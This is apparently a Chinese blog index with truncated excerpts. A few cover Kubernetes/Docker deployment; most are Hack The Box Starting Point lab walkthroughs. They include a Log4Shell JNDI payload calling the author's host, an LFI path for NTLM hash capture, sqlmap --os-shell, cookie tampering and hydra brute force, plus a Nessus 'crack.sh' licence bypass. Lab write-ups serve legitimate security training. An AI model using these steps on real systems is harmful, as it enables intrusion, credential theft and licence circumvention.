k8s 部署seata1.5.2(mysql+nacos+springboot)
本文使用的是nacos+mysql的方式 大致流程: MySQL建立对应的库和表 nacos配置对应的配置,以便java等应用能从nacos获取配置 k8s部署对应的负载,负载启动以后从配置文件获取nacos地址,然后从nacos获取配置启动 MySQL 建立库和表# 创建一个数据库CREATE DATABASE `seata`; 然后进入数据库中执行建表查询 use seata; CREATE TABLE IF NOT EXISTS `global_table`( `xid` VARCHAR(128) NOT NULL, `transaction_id` BIGINT, `status` TINYINT NOT NULL, `application_id` VARCHAR(32), `transaction_service_group` VARCHAR(32), `transaction_name`...
创建Nessus的Docker镜像 / 一键部署Nessus
Nessus支持很多种环境, docker vm 主机 aws等等, 这里主要介绍两种: 自己构建docker镜像, 也可以使用官网的, 使用一键脚本, 文章末尾提供一键脚本 参考: https://www.iculture.cc/software/pig=25546 官方提供docker版本的Nessus镜像,但是没有插件 https://docs.tenable.com/nessus/Content/DeployNessusDocker.htm docker pull tenableofficial/nessus 所以自己把插件添加进去, 在docker容器启动以后,运行下crack.sh, 就可以使用插件了 Nessus...
手把手构建AWVS的docker镜像
大致分为下面几个步骤 拉取debian基础镜像, 安装基础环境 添加awvs 和 license 到镜像, 并进行初始安装 构建镜像,并上传docker hub 使用镜像创建 awvs 容器 docker run -d -it --cap-add LINUX_IMMUTABLE -p 3443:3443 --name awvs k9scc/awvs:v15.4 /bin/bash /opt/awvs/start.sh 删除容器 1. 创建基础镜像Dockerfile FROM debianRUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&\ apt update &&\ apt -y install net-tools libx11-6 libxcomposite1 libxdamage1 libxext-dev libxfixes-dev libxrandr-dev libasound2...
docker容器中使用chattr修改文件权限报错 "chattr Operation not permitted while setting flags on ***"
docker中默认是禁止 CAP_LINUX_IMMUTABLE 的 像chattr这些命令,是无法正常使用的, 如果使用 chattr +i file 会提示 chattr: Operation not permitted while setting flags on *** 要正常使用chattr等命令, 需要开启 CAP_LINUX_IMMUTABLE docker run -it --cap-add LINUX_IMMUTABLE xxx 如果提示没有chattr命令,需要安装e2fsprogs centos/redhat/archlinux yum -y install e2fsprogs debian/ubuntu apt-get install e2fsprogs
Hack The Box :: Starting Point - Unified
扫描, 开放端口,22,6789,8443,8080nmap -A 10.129.56.105 --open 访问https://10.129.56.105:8443 经过搜索发现漏洞为 cve-2021-44228https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi 登录 抓包 把post的包发到Repeater,tcpdump监听网卡389端口,ldap默认389, 然后改包,发送, 可以看到收到一个发往端口389的数据包 "remember":false,#改为 ${jndi:ldap://本地IP地址}"remember":"${jndi:ldap://10.10.16.130/o=tomcat}", 部署一个jndi#安装编译环境并拉取项目编译apt install maven -ygit clone...
Hack The Box :: Starting Point - Vaccine
老规矩,扫描nmap -A 10.129.89.216 -v --open ftp匿名登录,有个backup.zip文件, 下载下来看下 backup.zip文件需要密码, 使用john进行破解,获取到密码 741852963zip2john backup.zip > hashjohn --wordlist=/usr/share/wordlists/rockyou.txt hashjohn --show hash 解压后, 查看index.php发现登录是进行hash对比, hash值是cmd5加密,解密后得到 qwerty789cat index.php https://www.somd5.com/ 用上面的信息访问下我们的网站 adminqwerty789 登录 搜索框有个搜索, 尝试用sqlmap跑下看看有没有注入, 同时需要带上phpsession的cookiesqlmap -url "http://10.129.89.216/dashboard.php?search=1"...
Hack The Box :: Starting Point - Oopsie
扫描发现22,80开放nmap -sV 10.129.114.125 访问web,发现/cdn-cgi/login/路径 另外爆破路径可以用gobuster,成功率取决与字典gobuster dir -u http://10.129.114.125 -w 字典路径 访问http://10.129.114.125/cdn-cgi/login/ , 有个login as guest 页面Account url id=2,替换为1会是什么样呢 cookies 修改cookie值,role为admin, user为34322刷新 ,可以发现upload可以上传东西 也可以对登陆页面可以暴力破解,但是通过上面的绕过更方便可以用burpsuite也可以用hydra 登录并查看请求信息 请求地址 http://10.129.114.125/cdn-cgi/login/index.php post的数据username=admin&password=1 hydra -l admin -P pass.txt -f 10.129.41.170...
Hack The Box :: Starting Point - Archetype
扫描nmap 10.129.95.187 -sV 查看smb共享目录smbclient -L 10.129.95.187 获取共享文件,看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123smbclient \\\\10.129.95.187\\backups ls get prod.dtsConfig 使用smbclient.py进行数据库连接,也可以用sqlmap,sqlmap更方便一些https://github.com/fortra/impacket #msclientpython mssqlclient.py sql_svc@10.129.95.187 -windows-auth#sqlmapsqlmap -d "mssql://ARCHETYPE\\sql_svc:M3g4c0rp123@10.129.95.187:1433/" --os-shell ...
Hack The Box :: Starting Point - Three
扫描nmap -T4 -Pn -sVC -p- 10.129.27.183 开放端口22, 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb 根据提示写入域名到hosts,然后爆破子域名echo "10.129.27.183 thetoppers.htb" >> /etc/hostsgobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts 一开始题目提示是 s3.thetoppers.htb 安装AWS客户端apt install awscli -yaws configure # 配置 上传shellaws...
Hack The Box :: Starting Point - Responder
端口扫描,发现端口80,直接访问跳转到 unika.htbnmap 10.129.216.188nmap 10.129.216.188 -A -p 80 -Pn 修改本地host文件,之后直接访问域名echo "10.129.216.188 unika.htb" >> /etc/hosts 可以看到版本语言为php 页面点击语言切换, 提示在page参数存在本地文件包含../../../../../../../../windows/system32/drivers/etc/hosts //10.10.14.6/somefile 获取NTLM hash修改http://unika.htb/index.php?page=//自己的IP地址/somefile ip a # 比如我这里是10.10.16.130 抓包responder -I tun0 把 hash值存入文件vim...








